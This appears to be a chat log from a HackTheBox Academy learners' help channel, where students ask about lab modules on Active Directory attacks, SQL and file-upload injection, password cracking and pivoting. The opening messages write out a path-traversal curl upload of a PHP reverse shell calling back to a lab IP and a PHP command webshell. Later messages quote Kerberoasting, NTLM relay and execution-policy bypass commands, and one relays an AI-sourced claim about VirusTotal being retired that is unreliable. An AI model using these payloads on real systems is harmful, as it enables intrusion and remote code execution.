curl -k -X PUT -H "Host: 10.129.203.7" --basic -u *****:********* --data-binary 'php -r '\''$sock=fsockopen("10.10.14.80",8001);shell_exec("zsh <&3 >&3 2>&3");'\''' --path-as-is https://10.129.203.7/../../xampp/htdocs/d.php

for FTP so far i know it should upload to https only. If i upload it to https://10.129.203.7/ I can download see it and download it.

so you need to write data to a file on the server, but it needs to recognize it as a php file, like this: <?php if(isset($_GET['cmd']) { system($_GET['cmd']); }?>

a php file with php -r in it won't work

so i uploaded curl -k -X PUT -H "Host: 10.129.203.7" --basic -u *****:********* --data-binary '<?php if(isset($_GET['\''cmd'\'']) { system($_GET['\''cmd'\'']); }?>' --path-as-is https://10.129.203.7/../xampp/htdocs/g.php
successfully

I tried accessing via https://10.129.203.7/xampp/htdocs/g.php

or included a cmd at the back https://10.129.203.7/xampp/htdocs/g.php?cmd=dir but i still get a blank page

it might not like the indents or spacing...maybe just --data-binary '<?php echo shell_exec($_GET["cmd"]); ?>' and is just going back one folder right?

u can do like this:

1. Put the info into a local page, and then extract keyword by cewl
2. After manually removing some words that are obviously not a part of password, u can combine them cause the password is longer than keyword. I use

hashcat --stdout -a 1 word.wordlist word.wordlist > word_combine.wordlist

3. Remove the line that less than 12 characters, and then use hashcat as this section did

Your third point isnt actually helpful, since mutating the wordlist is the goal

So mutating can add length

Good catch. so less than about 8 characters, or there are so many too short lines

I found out the answer.
Here is the hint:
Step 1:
Go to https://www.inlanefreight.com/index.php/contact/
Step 2:
Put your mouse on top of the email address for enterprise@inlanefreight.com
Then you can see the email address on your browser near bottom left corner.

yo can anyone tell me if the kerberos double hop issue is still a thing even when using ligolo already routed the internal address to our attacking machine

Hi everyone, does this image rappresent 2 distinct forests or one forest with 2 distinct trees?

The section says 2 distinct forests but i dont understand the reason and how to see that

attacking common application for splunk and prtg is very laggy

does this happend to you guys as well?

anyone?

2 forests

Each domain is its own tree, so dev.inlanefreight.local is its own tree in the inlanefreight forest, dev.freightlogistics.local is its own tree in the freightlogistics forest

Howdy; I cant quite figure out what I'm doing wrong, and despite trying numerous things and googling, I still cannot figure out what the issue is, so hopefully a set of eyes from a knower could help!

I'm working on the File Upload Attacks Skill Assessment, and pretty much right before the end. I managed to upload a malicious svg file to yoink the source code, and from my understanding of the source code, my php file should bypass the mime filter, the white and blacklist, and everything else...but I'm still getting the only images allowed error.

dm me

Deeply unfortunate, we checked and it appears I am doing it correctly however I still seem to be getting the img error; reset of target, payload change, magicbytes change, and still borked hah

Hi guys, can you say if I am on correct way for MSSQL, Exchange, and SCCM Attacks SA 3rd question
Please DM to me, thanks~

A solution was found, bless you @brave field 🙏

cant solve the Network Enumeration with Nmap, Medium lab question, tried everything
please someone help me
"After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer."

(even i have completed the hard one)

Did you look for UDP ports?

yupp

With Version scanning ?

i found the port number 53 on udp, and its service version as "NLnet Labs NSD"

but thats not answer

i tried -sC, -sV, and some custom scripts

use the --script dns-nsid

Also try on the parrot VM from htb I've heard people who had the same issue for some reasons and fix it by switching VPN file or doing it from HTB VM

ok, let me try on HTB VM with --script dns-nsid

Did it on my own kali VM, no issues. EU server.

run : nmap 10.129.149.23 -T1 -sS -sV -sU -p 53 --script dns-nsid --source-port 53 -v -Pn -n @ HTB VM

its successful

thanks @hidden ledge and @brave field

.

but why it succesed this time, and not in my own kali machine

?

It worked fine on my kali VM

which VPN server? I am on EU 5

eu 3

I don’t know but you are not the only one who had the issue

ok, we can leave it, its done naa,,,why wasting brain power on unneccessy things

Does anyone has completed the HTB AI Red Teamer path? I need some guideline regarding that

On the module Windows Event Logs & Finding Evil on the first one.The first question says Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: TW__.exe
I have connected with RDP and opened windows event viewer.I also found the log on 8/3/2022 at 10:23:2025 but i dont see anything close to the answer format.
Can someone help me please

conduct the investigation as outlined in the reading

you start with the logon event; and follow up

Hello Everyone on the Skills Assessment - SQL Injection Fundamentals I tried all the injection payloads and Nothing is working

academy.hackthebox.com/module/33/section/518

hello i need help on Password Attacks Module (Pass the Ticket (PtT) from Linux)

look for other endpoints

Help with skill assessment II of attacking common applications first question : find the URL of the Wordpress instance

Anyone did the Skills Assessment - File Upload Attacks? Correct me if I am wrong, the PNG extension fails the MIME test because it's intentional or is it just me? Thanks.

gobuster, ffuf, plenty of ways to fuzz for vhosts

you'll need to combine techniques

¯_(ツ)_/¯

also the module is above tier 0, so please avoid spoilers

could be that it just doesn't accept pngs, it's been a minute since i've done it

in the Content-Type header it does, if possible could you try it with PNG MIME type and let me know in the dm thanks

i'm not doing sanity checks atm; sorry

hey, i this where i can ask about subscription matter ?

I am in attacking common applications skill assessment . I can’t find credentials for the third vhost I have discovered . Any help? I tried brute forcing the password and using the default username

issues with subs should be directed to website support, not the discord

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Does anyone can help me with module: Windows Attacks & Defense
Page 15
Section: PKI - ESC1
I can't send file cert.pfx to WS001 couse idk how ❗️

guys I need help with Attacking Common Applications - Attacking WordPress

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

I tried this but no luck after one hour

The one with the username john? on wordpress?

you need to enumerate the users with WPScan

John isn't the user you need to brute force

WHO CAN HELP ME WITH ""PKI - ESC1" in CDSA module "Windows Attacks & Defense? 😐

Thats my last questions

Anyone

Can someone help me with "Skills Assessment - WordPress" section of WordPress module? I don't understand one thing - exercise states that public facing website is on Wordpress, but in any way I can't find anything related to wordpress on that site - no meta, no wordpress related directories, no readme, no license and subpages are html files (which should rather be PHP on wordpress). I also tried IP reverse lookup even dirbuster, but this didn't help me in any way. Should this look like this? I don't want exercise answers that much, because I want to learn by doing it myself, but I'm questioning whether or not this is expected

Okay, I realized something during writing above

There was info about "Linux DNS mapping" in the module and there actually was one URL that didn't work

I had to add it to /etc/hosts and now I have access to some wordpress blog

Hi all, need to clarify something. how to open an elevated PowerShell ? When using "Run as administrator" I get the following error which sounds weird...

What is the name of the network interface that MTU is set to 1500?

Please help me

Ooooh thank you so much.

Open the alert "[InsightNexus] Admin Login via ManageEngine Web Console." Find the foreign IP address starting with "203" in the comments. Check VirusTotal for the information related to this IP address, and add the details as a comment in this alert. In VirusTotal, what is the name of the file starting with "Mango" in the Files Referring section? So that is the question, but where is the Files Referring Section?

So did they take off the Files Referring section no VirusTotal?

Currently doing Windows Server Update Services (WSUS) on || Compromise the DC01 using WSUS. Submit the flag located at C:\WSUS\flag.txt || Curious on how to force an update on the DC?

Hello there, i am stuck here : Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt. Can i dm someone ? The reverse shell isn't working. I have this message : Command executed with process ID 3684 on DC01 But no reverse shell. I don't know what i am doing wrong

@zinc pumice Please take care not to post content from modules above tier 0, like attack paths etc

Sure, I'll be careful from now on.

Hi, I am doing Getting Started, Knowledge Check Question. I used msfconsole and succesfully exploited getsimple, my question is i am having difficulty doing privilege escalation, any hints/links to resources would be appreciated, This is my first question if i am posting it on wrong channel, please guide to the correct one, thank you for your help 🙂

You found creds, but the password is in hash form. Try to crack it. If successful, then see where these creds can be used.

Hi folks.

I am doing LLMNR/NBT-NS Poisoning - from Linux

There is a question to run hashcat to crack the hash, and submit the cleartext password as your answer.

I ran it on attacker01 machine, but it gave this error

error: unknown target CPU 'generic'

* Device #1: Kernel /usr/local/share/hashcat/OpenCL/shared.cl build failed.```

I'm using
Pwnbox: SG
US Academy 4

I'm current doing "Attacking Active Directory and NTDS.dit".

I'm trying to find valid usernames.

I have a text file that has usernames using || username-anarchy ||

I'm using ||kerbrute|| with the command
|| kerbrute userenum --dc machine_IP --domain inlanefreight.local gen2.txt ||

I'm getting KDC ERROR wrong realm which means I have the wrong domain.

Note that I only followed the domain used on the module. What could I be doing wrong? What domain should i use?

I also tried using another version with command || kerbrute_linux_amd64 userenum --dc 10.129.12.127 --domain inlanefreight.local gen2.txt ||. Same result

did you add the domain name to /etc/hosts file?

I did not 🤦 It worked now but still hasn't found a valid username. I'll figure that out on my own. Thank you very much.

kerbrute likes FQDNs

Got it now. I'm still apparently using the wrong domain. I ran || nmap scan || and it showed me the right one.

Anyone can help me in the graphql attacks module with sql injection? cant input the payload right
I tried it now 2 days and i dont figure out.
DM me would be better.

What is the name of the network interface that MTU is set to 1500?

Please help me

lookup "network interfaces"

I guess “eth0” but still saying incorrect answer

Read the whole line of each interface result. You would see the answer

Well, I found out that it's working with a real device but not with an emulator. Both the newest Frida version and the one used in the module do not find the native lib on an emulated device, while it works on a real device

Guys I am stuck since yesterday on [Attacking Common Applications Module | Attacking WordPress Section]. I found the username and password for the /wp-login.php , But when I use them on msfconsole , it says payload upload failed.

Try using some of the other RCE vulnerabilities. Did you also try just logging in with that user?

yo guys

im on file uploads - blacklist extensions section
i found out allowed extensions, and im trying them one by one, but none seems to be executed by php

Keep trying different ones, just because it’s accepted doesn’t mean it will give you shell. There should be different ones that were “accepted”.

Anyone can help on Network Foundations -> Skills Assessment -> Chapter 3. - Target Acquired (OPTIONAL)?

I'm supposed to:

1. nmap -p21,80 -sC -sV <target ip>

2. nc <target ip> 21

3. USER anonymous[Ctrl+V][Enter][Enter]
   PASS anything[Ctrl+V][Enter][Enter]
   PASV[Ctrl+V][Enter][Enter]

4. nc -v <target ip> <dynamic port>

On 4th there's the problem; Last two passive mode numbers are 194 and 13.

The calculation is supposed to be 194*256+13 = 49677 aka the dynamic port, but it doesn't work.

it's supposed to return:

But it returns:

will a webshell work ? or do i have to upload a php reverse shell ?

only webshell, reverse shell not possible with IP:PORT exercises

i was planning to use ngrok but np

you can try

i was doing it wrong, yell heah

You need to keep the control channel open.
So nc <target ip> 21
USER anonymous[Ctrl+V][Enter][Enter]
PASS anything[Ctrl+V][Enter][Enter]
PASV[Ctrl+V][Enter][Enter]

Open a new shell (while keeping the control channel open) and connect to the data channel :
nc -v <target ip> <dynamic port>

I'm working throught the penetration tester course and I'm on "Windows Privilege Escalation: Windows Server". For some reason both xfreerdp and rdesktop(rdesktop -u htb-student -p HTB_@cademy_stdnt! [IP Address]) aren't working. anyone have any advice? I am using pwnbox to try and connect. nothing on the forums is helping either 😕

Yeah so it still doesn't work.

This question was asked several times, many times left unanswered and apparently, some guy stated that you have to be super fast for it to work.

Just tried that and I got a few steps further.

Now im supposed to do:

LIST[Ctrl+V][Enter][Enter]

and

RETR[Ctrl + V][Enter][Enter]

which returns invalid number of parameters

You can dm me btw so we can go through this 🙂

I've DM'd you

I am having an issue with getting the vnc password, in the skill assessments part of the windows lateral movement, i am pretty sure, i have to port forward to forward to get where i am going but i can’t find any ports open can someone dm me if they can help.

Can anyone provide some assistance with the LLM Output Attacks Skill Assessment?

hi can I ask for help on the skills assessment

Hello, for the cracking passwords with hashcat section on cracking wireless handshakes with hashcat i'm having a little trouble with the hashcat-utils.git. I git clone the hashcat-utils, cd into the hashcat-utils/src, and when doing the make command within the terminal it doesn't really compile anything and returns an error. Apparantly its something about a rule with the cap2hccapx.c thats its not able to make a target for. The screenshot will probably help a bit more with what I'm dealing with, but I would definitely like to try and get this working for the module.

square brackets indicate key presses

Hello

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

still need help with the LLM Output Attacks Skill Assessments if anyone sees this later and is able to help would be very appreciated (ended up solving it. If anyone in the future sees this and needs help feel free to dm me)

i'm stuck on the last part of the skills assessment for the "Introduction to Advanced CSRF & XSS Exploitation" module.

i have identified ||the SQLi, and dumped the table names.||

||the only table that stands out is "files", and when i try dumping stuff in it i keep getting {"error":"Something went wrong"}.||

any help would be massively appreciated

i'm doing the "SQL Injection Fundamentals" skills assessment and i’m kinda losing my mind lmao
i got the first SQLi working fine, then found a second injection point

i managed to:
map the db/tables/columns
confirm _ table exists
confirmed there's a user called 'admin'
but i can’t get the answer to
“What is the password hash for the user 'admin'?”
i tried using SUBSTRING(), ASCII(), even a subselect inside a CASE WHEN, but it keeps throwing 500 errors

am i just making this 10x harder than it needs to be 😅

I need help , I am in AD trust attacks , in "SID Filter Bypass (CVE-2020-0665)" I can't connect to sql02 , I did set it up proxychains and ssh D tunnel ?

i've been stuck on the same task -- tried fuzzing the target, doing sql injections to login and registration -- now running a bit low on ammo 😄 hints are more then welcome

I've been stuck at the part just before you for weeks. I can't get the initial payload to work. I ||found the endpoint||, but I either get nothing back or I get the message you're getting

have you identified the ||SQLi|| or what step are you stuck on exactly?

The module is above tier 0, so be mindful of that or take to dms

how and who should I dm ?

My message was strictly to the person above since they replied to another user asking for help

You'll have to be patient for someone thats done the same module to offer assistance

like how much patient hours or days ?

the help here is community driven ¯_(ツ)_/¯

last time I asked for help , never get any help for a week and then I move further to other sections

Higher tier modules are less likely to have someone have completed them (tier 3 and up); if your ask gets buried you can bump it/reask

last time it get buried or lost

I will bump this time, thank you for your response and guidance 🙂

The ad trust attacks module yeah? I've been slowly setting up the burner to get back into studying

I'm in Penetration Tester - Attacking common services - Attacking SQL Databases - Question 2. I have logged into the DB as htbdbuser, or MSSQLSVC. It seems neither have the privilege to do anything. So I tried to impersonate. When I run the commands to list users I can impersonate, I get no results. Any idea?

I love all the modules and content so far , I only had problems with lab setups , never had any issue with the attacks . this time also I might be doing very silly mistake

I don't recall the module specifically, but in my notes I never needed to directly connect to SQL02. Your connection problem to it isn't really related to the module contents but instead some network issue preventing you from connecting, or the service you're connecting to isn't open

yes , we need to setup a SSH dynamic tunnel , then we have to use proxychains to enumerate SQL02 , I already added sql02 in my /etc/hosts. also my tunnel is up but still I am getting this error ? "File "/usr/local/lib/python3.11/dist-packages/impacket/nmb.py", line 907, in _setup_connection
    raise socket.error("Connection error (%s:%s)" % (peer[0], peer[1]), e)
OSError: [Errno Connection error (172.16.118.11:445)] timed out"

I also check port 445 though nc which shows open but when I did nmap it show filter

Again, I don't think so. I didn't do any of that.

can I dm you ?

ok

As an FYI on use Google Threat Intelligence is what I was told from AI that VirustTotal no longer has a file reference anymore. The Relations tab was removed from VirusTotal as part of its migration into Google Threat Intelligence (GTI), which is replacing VirusTotal as a standalone product.
Here's what’s happening and why it matters:

🧠 What Changed and Why
• VirusTotal is being phased out: As of 2025, Google is retiring VirusTotal as a standalone platform and migrating users into Google Threat Intelligence (GTI).
• GTI introduces new features: These include curated threat actor profiles, campaign reports, and a new score for indicators of compromise (IoCs).
• Legacy features like the Relations tab are being deprecated: The Relations tab, which showed connections between files, domains, URLs, and IPs, is no longer available in the GTI interface. This is likely due to GTI’s shift toward curated intelligence rather than raw community-driven data.

Nvm Google Threat Intelligence does not currently offer a direct file referral program like VirusTotal’s legacy public submission and sharing model. However, it provides private scanning and API-based submission workflows for enterprise use.
Here’s how to approach file submission and referral-like workflows in Google Threat Intelligence (GTI), especially if you're transitioning from VirusTotal:

Hi, I’m stuck on NoSQL Injection – Skills Assessment 2 in the CWEE path. I’ve already enumerated the valid username, but I can’t progress any further, none of the three endpoints seem to react to NoSQLi payloads (dot/bracket notation, $ne, $regex, JSON bodies, URL-encoded forms, timing, etc.). Everything returns the same “missing parameter” messages, and I can’t get any vector to trigger different behavior. Could someone give a small hint on what general direction or payload format I should be focusing on next (dot notation, JSON, x-www-form-urlencoded, etc.)? Thanks!

I don't get anything back in the python logs showing ||a successful SQLi||. I'm at the part where I'm trying to figure that out ||using a payload very similar to the one in the module||. I found ||the other endpoint||, so that's what I' attempting to target.

nice congrats

@tough gorge Please take care not to post content from modules above tier 0. Make sure to state which module/section/question you're on, what you need help with, what you tried etc. If you feel like you need to reveal more info you can ask someone to take it to DM's.

I am doing the module - Active Directory & Attacks, and I'm stuck on the lab for ACL Enumeration. I need to use PowerView.ps1, but whenever I try to run it, all I get are errors. I've reset the machine three times, and I've also downloaded a fresh copy of PowerView.ps1. I've never encountered these problems before. I even used powershell -ep bypass -nop -c, but even though I don't get any ouput, when I run a PowerView command, then I get errors again.

Have you researched the error to see if others have had the same error and what they have done to fix it?

I'd like to ask whose idea it was to put || Pivoting tunneling || technique in Password attack assessment when that topic is 2 modules after Password attacks? What's the thought process on that?

where'd they do that?

the ptt from linux section?

the section shows you what to do, you don't really need the whole pivoting module

i was wondering if some could explain why on case 8 of sqlmap fundamentals in the instuctions it has --csrf-token="token" as the command but does not work but works when you use --csrf-token="t0ken" i dont know if this is a spoiler or not or a mistake in the command

https://academy.hackthebox.com/module/58/section/530

sqlmap version 1.9.11.3#dev

It says right there on the page, a non-standard token name is used

it's just the name of the parameter for the token

it is by design

Hello everyone

I tried to solve the question which is related to wayback machine in the web edition section of penetration tester path.The question is about paypal.com.The answer should be Palm Organizer according to wayback machine result but it didn't accept that answer

Can u help me please?

@cloud urchin i dont see where it says those words or maybe am half asleep lol

if you visit the website on the target you spawn it says at the top

so it does i think i just didnt quite understand why i did it lol thank for the explanation bro

It is case sensitive i think, also remove the tm from it when copying

I removed it but didn't work

Did you copy it from the wayback machibe itself?

Yeap

Weird. It should work then

@fathom pendant Hi am iallowed to talk about the issue ? cause the thing ive tried one method and it worked back then but smh when i tried to to do it again im getting errors for some reason

Hello could some give me a little nudge for the AD Enum & Attack skill assessment II for this question: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

I'm system on SQL01 but can't pivot on MS01 with hashes I dumped 🙁

I'd enumerate the users using their creds you've harvested from SQL01.

Didnt find creds on SQL01 yet i'll try again

When I say creds, that can be cleartext, NTLM hashes, etc.

Well I dumped local hashes and looked for creds with Lazagne,snaffler and manually but didn't succeed

Hashes seems useless in order to pivot

I'll try responder

You can send me a DM

Can anybody share their AD Enum notes? I feel like mine is disorganised af

Hi, can help with signature wrapping attack for SAML?

Yes I logged in with the user, I got to the admin panel, tried injecting php get code in the 404 page, no luck. I am still stuck.

anybody doing eighteen machine?? im hard stuck at the very beggining trying to enumerate the db... did the impersonate to that user and tried some stuff but nothing

make your own, you'd benefit more that way

redo if you need to

hello

can someone assisst me with the Phishing in the xss module the payload works just fine and i can intercept the tested creds but however i encode the script it always says url invalid

https://academy.hackthebox.com/module/289/section/3236
The network concepts is so long, and i need to read all this?

these concepts are the foundations of every other network thing you run into; this is stuff that you'd learn in any college with a Tech/IT focus

The OSI and TCP/IP stacks are core to understanding how certain components interact

like is the tunnel acting at layer 4 or layer 3; does it operating at a different layer impact its functionality and capabilities

read allat will take a long time for me

comprehension >>>>> speed

aight

thank you

your skills fall apart if you build them on a shaky foundation

the stronger your foundation, the less you have to go back and 'relearn' things that you should have learned first

I still need helppppp

What's the usual solution to this? I'm doing pass the hash exercise from Password attacks. I reconnected multiple times, spawned target multiple times as well. Even set mtu to 1200., reconnect VPN... Still the same issue SOLVED changed VPN file

heyy fellas
I am stuck at linux privilege escalation skill assessment Flag2
I am little stuck and I need a little nudge.

im new here, and cant really help you, but based on previous experience with asking for programming help, people might appreciate some more info. in the interest of saving more experienced people's time, what have you tried, and whats your approach? (remember, i just joined this server today, but the people who will be able to help you would appreciate this info, im sure 🙂 )

Stuck here can anyone can explain

Ok guys, this might be a dumb question, but where can I view all modules that Ive "favourited" i.e. clicked the heart icon on? Im about to start the Getting Started module in the Penetration Tester career path, and have "favourited" all the modules Im lacking prior knowledge which are listed as prerequisite for this one, from the description. Id like to work through those first.

Also, separate question, also possibly dumb/due to my non-understanding of the way the platform works, but I started the career path with 120 cubes, and was under the understanding that completing a module gives back all the cubes needed to unlock it, however I now have only 80 cubes. Could anyone please shed some light on these question?

Thanks!

Completing the module gives 10% of the cubes back I think

i think tier 0 costs 10 to unlock and you get them all back, but not the higher modules

Are the modules in the career paths not all free?

no, most aren't

Ahh ok, how can I distinguish the free from non-free? Not that it will affect what I try to complete, but so i can more effectively plan buying the cubes needed

actually i think you get 20% not 10% of higher tiers

tier 0 is "free", costs 10 cubes, gives 10 cubes back

anything above that is like 20% return on cubes

ahhh i see. the Penetration Testing Process module is T1 but the next one, Getting Started is T0, so thats where I got confused. I had it in my mind that modules would follow an ascending Tier progression as you progress through a path. Thanks!

Do you happen to also know where I can find the favourited modules?

idk

20%

Ive done the monster math on it a bit

I need help with this module's question. I've tried everything and even asked the AI, but I still can't solve it.
https://academy.hackthebox.com/module/21/section/128

For linux priv esc special permissions, the answer seems to be buggy.

This file should work for both answers because the setuid and setgid bits are set

I solved it and found the other two binaries, but that was a bit annoying

You're likely off-by-one

What steps did you take to "run powerview.ps1"?

try importing it first then running a cmdlet

Is that how I was supposed to do this and I'm misunderstanding, or was this a bypass thing?

PS C:\Users\htb-student\Downloads> Import-Module .\PowerView.ps1
Import-Module : File C:\Users\htb-student\Downloads\PowerView.ps1 cannot be loaded. The file
C:\Users\htb-student\Downloads\PowerView.ps1 is not digitally signed. You cannot run this script on the current
system. For more information about running scripts and setting execution policy, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1

• Import-Module .\PowerView.ps1

•   + CategoryInfo          : SecurityError: (:) [Import-Module], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand

Hello all

Active directory enumeration: DCSync attack , i'm stuck there.
I tried secretdump.py with adunn credential to dump hashs but it don't work.

I also connected to ACADEMY-EA-MS01 using xfreerdp and try to make dcsync attack with mimikatz . but it still don't work.

The question is unclaire for me.
Some one to help

You still need to use execution bypass

Okay, this finally got it to work: Set-ExecutionPolicy Bypass -Scope Process -Force; Import-Module 'C:\Users\htb-student\Downloads\PowerView.ps1' But why was this necessary? Why can't you just transfer over PowerView.ps1 and run it like normal?

Importing it is normal. You're importing all the cmdlets so you can run them.

It's not a standalone script you just run, you use the cmdlets it has

Did you get a command prompt as adunn using runas??

Introduction to Windows Evasion Techniques: Open-Source Software
i tried to manipulate CorExeMain and mscoree.dll but it doesn't work

Guys, what am I missing there? Web Proxy>Burp Intruder section

You have a typo

On where?

‘/admin’ ?

ahh no !.
Let me try it

Make sure you have url encoding off Kemal

.

Uh

No it doesnt works

@obsidian meteor @hidden ledge please remove those flags

That is a tier 1 module

Read the channel subject

Sorry

Sorry

Didn't pay attention]

Should i delete all the post?

or?

🤷‍♂️ I'd suggest taking it to DMs if someone is up for giving you a nudge

Thanks

Sorry had no intention of showing flags i didnt know about it

No worries

Hi, I am having a problem win DACL Attacks II > SPN Jacking (https://academy.hackthebox.com/module/255/section/2911) There is a point in which we have to create a ticket with rubeus using the credentials of the target machine (SRV01$ and its NTLM hash), but it is not said how they got those creds. We have to do the same for another machine, but I don't know how to get its hash. Can anyone help me?

I also feel I am missing something silly

I'm working on "Kerberoasting - from Windows" exercises which is to crack the certain spn account. I'm wondering why rubeus and powerview command give different hash. I was able to crack the hash provided by rubeus but the powerview one is throwing error when trying to crack them using hashcat.

Powerview:
PS C:\Tools> Get-DomainUser -Identity svc_xxx | Get-DomainSPNTicket -Format Hashcat

Rubeus:
PS C:\Tools> .\Rubeus.exe kerberoast /tgtdeleg /user:svc_xxx /nowrap

Hello Everyone, I am in the CPTS course topic: Pivoting, Tunneling, and Port Forwarding, Under Dynamic Port Forwarding with SSH and SOCKS Tunneling, where you are expected to perform rdp through proxychain into the victim machine (the last question in the section). If all the steps are followed as per the dynamic port forward, the nmap results show no ports found as they are filtered. I was able to connect the system directly through proxychain , but my question is, how to go about if the port is filtered and not showing up in the scan,

ok many things wrong... I don't need the hash of the target machine, but the hash of the machine on which I am local admin. Can be done via mimikatz started from a powershell run as admin...

If you copied the output from the terminal running PowerView, it likely has spaces.

^ if you look closely to the image I share. the two hash is different. 1st one starts 09F and ends 417D, while the powerview starts 7E8 and ends 70C1

I think the hashes captured during Kerberoasting appear different each time due to dynamic ticket data, but they were all encrypted using the exact same password-derived key. This allows any of the unique hashes to be successfully cracked back to the single, consistent password.

Yeah that's indeed. correct. I'm just wondering why rubues and powerview produce different results.

Well nevermind. I reset the lab and do it again. right now in my current test I am getting same result for both tools.

This is the SIEM Visualization Development module, the SIEM Visualization Example 4: Users Added Or Removed From A Local Group (Within A Specific Timeframe) section. I added the row @timestamp to get the "common date," but it's saying that my answer is wrong. I am not sure what I am doing wrong here, is it that @timestamp not what I think it is or what?

this view shows week of, not day

I don't get it, are you referring to this?

I just changed it to "days" and refreshed, but the table's results did not change

Well, this is weird. I changed the "Absolute" dates on the calendar from Mar 1 -> now to Mar 1 -> Mar 31 and that obtained a new value

The new value got accepted, but I have no idea why a new value was obtained in the table to begin with

Its silly

hi everyone, can someone help me with the last question of Pass the Certificate (a lesson in Password Attack module). i keep encoutering the same issue with impacket-ntlmrelayx -t http://10.129.234.172/certsrv/certfnsh.asp --adcs -smb2support --template DomainController after i ran printerbug.py to authentication against my kali machine
[*] GOT CERTIFICATE! ID 19
Exception in thread Thread-6:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1043, in _bootstrap_inner
self.run()
....

I used --template KerberosAuthentication and it worked fine

Hi! I cant connect to machine https://academy.hackthebox.com/module/176/section/1780 with the password given in the end of the page..

I was still connected yesterday correctly

Why?

ow thanks, it worked. But why?

Also found the file as ?.html but ../admin/?.html or ../admin/%3F.html doesn't give me anything

(Footprinting Iab - hard) i UDP scanned the box and got SNMP, and version scan said “SNMPv3” but it still uses community strings??

But I thought only SNMPv2c uses community strings?

Don't take nmaps result as gospel.

Also that module is above tier 0 from what I recall, so the solution shouldnt even be posted anywhere

Sorry

So sometimes nmap scans can give results that are wrong?

Yes

How was I supposed to know it isn’t really version 3🤨?

Its also mentioned in the reading that devices may use v2 strings as they transition to v3

Lemme check

Actually it says “many organizations are still using SNMPv2, as the transition to SNMPv3 …”

Wait did you just remember that or you went to check that section?

guys plz i need help api attacks skill assessment even when i upload a pdf file i still get the same error i tried different sizes but same error

I help often enough that its just there

hello

Hello everybody! I can't find the target ip in the Incident Handling Process course, in the Cyber Kill Chain module. Can you help me?

Look just above the questions for a "spawn target" button, [not the spawn instance button]

Btw, its incident handling process module, cyber kill chain section

plz help me i tried everything i dont know why its not working

@neon nova "Click here to spawn target!"

Right next to Target(s):

I'm blind, thanks.

Np

I spent 2 hours searching for this button 🤣

i successed fck one detail it was important to take care of

gonna break out in any minute

Hi i am unable to figure out this question of the "Reversing Hybrid applications" section of the "Android Static analysis" module.
Any nudge for the same?

Hi. I'm stuck on the Skills Assessment for the Session Security module. I've managed to get the session identifier for the superadmin but the 'change-visibility' call is returning a 401 unauthorized - i can't tell if this is expected or if something went wrong on the challenge itself

Any direction would be appreciated.

I'm having an issue with connecting via RDP to the provided VM in "Windows Attack & Defense - Kerberoasting" module/section.

└─$ xfreerdp /v:10.129.194.237 /d:eagle /u:bob /p:Slavi123 /dynamic-resolution
[14:08:58:053] [49877:49878] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[14:08:58:053] [49877:49878] [WARN][com.freerdp.crypto] - CN = WS001.eagle.local
[14:08:58:255] [49877:49878] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D] from server
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core.nla] - SPNEGO failed with NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D]
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_AUTHENTICATION_FAILED [0x00020009]
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[14:08:58:255] [49877:49878] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

Anyone available to help?

I've restarted the VM several times too. I've also tried xfreerdp /v:10.129.194.237 /u:eagle\\bob /p:Slavi123 /dynamic-resolution

for incident handling process module's skills assessment question 1, I found the IP address in the comment in the alert. I am trying to navigate to that IP address but the page will never load. I tried it with http not https because https obviously isn't gotta work

can someone help me out?

in fact the connection loads out

Hi noob here, I ssh onto the win machine PS console I Put in Get-ADuser but when I want to type -Filter or - anything it goes invisible what I type after

I need help with this module's question. I've tried everything and even asked the AI, but I still can't solve it.
https://academy.hackthebox.com/module/21/section/128

I answered this yesterday, you have an off-by-one error. Its not expecting users to do ||${#var}||

hi I asked several hours ago with the skills assessment and someone in DMs tried to help me but they can't find the answer either. is anyone who has done CDSA available for DM?

I asked here in #modules many times

I'm wondering what I should do at this point

I literally completed the first module, and then the second one and then they added the skills assessment to first module

so need to complete

what do you recommend I do?

should I just go onto the next module and come back to it later?

hi has anyone done the skills assessment for the incident handling process?

and if so can I get help with it?

The question doesn't say to navigate to the IP. The question says to look it up on VT.

I did

but it gave no results

on VT

VT had nothing on the IP

I also tried multiple other things

I also don't have the file

actually I looked it up in VT first, THEN tried navigating to the IP as a backup

neither worked

not that navigating to the IP was smart but I thought someone else in this chat had done it so I tried to do it

Then you have the wrong IP, I checked myself it's all there

@rustic sage Please take care not to post content from the modules above tier 0, especially skill assessments. Your post had the IP of a machine you have to pivot to.

It sounds like you're really not reading and understanding what the question wants of you. It says to go to VT and then to a certain section of VT. It works if you have the right IP. Make sure you read the whole question, slowly, to make sure you do every part of what it asks.

